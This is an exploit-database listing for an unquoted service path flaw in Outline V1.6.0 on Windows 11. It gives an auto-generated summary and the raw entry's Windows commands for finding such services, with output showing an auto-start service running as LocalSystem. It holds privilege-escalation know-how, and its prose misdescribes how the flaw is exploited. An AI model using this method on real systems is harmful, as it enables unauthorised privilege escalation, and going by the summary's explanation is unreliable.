header-logo
Suggest Exploit
vendor:
Microsoft Windows 11 Enterprise
by:
Milad Karimi (Ex3ptionaL)
8.8
CVSS
HIGH
Unquoted Service Path
22
CWE
Product Name: Microsoft Windows 11 Enterprise
Affected Version From: V1.6.0
Affected Version To: V1.6.0
Patch Exists: NO
Related CWE:
CPE: o:microsoft:windows_11_enterprise
Metasploit:
Other Scripts:
Platforms Tested: Microsoft Windows 11 Enterprise
2022

Outline V1.6.0 – Unquoted Service Path

Outline V1.6.0 is vulnerable to Unquoted Service Path vulnerability. This vulnerability can be exploited by an attacker to gain elevated privileges on the system. The vulnerability exists due to the OutlineService service not being properly quoted. An attacker can exploit this vulnerability by creating a malicious service with the same name as the OutlineService service and placing it in the same directory as the legitimate service. The malicious service will then be executed with elevated privileges.

Mitigation:

Ensure that all services are properly quoted and that all services are running with the least privileges necessary.
Source

Exploit-DB raw data:

# Exploit Title: Outline V1.6.0 - Unquoted Service Path
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Discovery Date: 2022-11-10
# Vendor Homepage: https://getoutline.org/
# Software Link: https://getoutline.org/
# Tested Version: V1.6.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 11 Enterprise
# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Outline Updater OutlineServiceSvc C:\Program Files (x86)\Outline\OutlineService.exe
                      Auto

C:\>sc qc OutlineService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: OutlineService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Outline\OutlineService.exe
        
LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OutlineService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>systeminfo

OS Name:  Microsoft Windows 11 Enterprise
OS Version: 10.0.22000 N/A Build 22000
OS Manufacturer: Microsoft Corporation

Navigation

Suggest Exploit

Services By CQR